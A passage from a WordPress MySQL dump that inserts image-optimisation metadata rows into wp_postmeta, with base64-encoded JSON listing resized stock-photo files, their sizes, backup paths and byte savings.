lbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg0NjgsImlkIjoyNTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4ODQzMzItNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg0NzEsImlkIjoyNTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30275, 256, 'wpfc_optimisation_reduction', '127066'); 
INSERT INTO `wp_postmeta` VALUES (30276, 256, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5OTIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEuanBnIiwicmVkdWN0aW9uIjoxMjcwNTIsInRpbWUiOjE0ODM1ODg0ODIsImlkIjoiMjU2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg0ODUsImlkIjoyNTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTgwMHg1MzEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTgwMHg1MzEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTgwMHg1MzEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NDg4LCJpZCI6MjU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS03Njh4NTEwLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS03Njh4NTEwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS03Njh4NTEwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODQ5MSwiaWQiOjI1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTYwMHgxMDYyLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTE2MDB4MTA2Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTYwMHgxMDYyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODQ5NSwiaWQiOjI1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg0OTcsImlkIjoyNTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIzODA4MjUxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NTAwLCJpZCI6MjU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMzgwODI1MS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODUwMiwiaWQiOjI1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MDUsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MDgsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MTAsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MTIsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MTUsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MTgsImlkIjoyNTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjM4MDgyNTEtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MjEsImlkIjoyNTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30277, 255, 'wpfc_optimisation_reduction', '69131'); 
INSERT INTO `wp_postmeta` VALUES (30278, 255, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE5ODcsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAuanBnIiwicmVkdWN0aW9uIjo2OTExNywidGltZSI6MTQ4MzU4ODUzMSwiaWQiOiIyNTUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODUzNCwiaWQiOjI1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtODAweDUzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1MzcsImlkIjoyNTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTc2OHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTc2OHg1MDkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NTM5LCJpZCI6MjU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xNjAweDEwNjAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtMTYwMHgxMDYwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xNjAweDEwNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NTQzLCJpZCI6MjU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU0NSwiaWQiOjI1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjA1MDYyODAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1NDgsImlkIjoyNTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzIwNTA2MjgwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NTUwLCJpZCI6MjU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI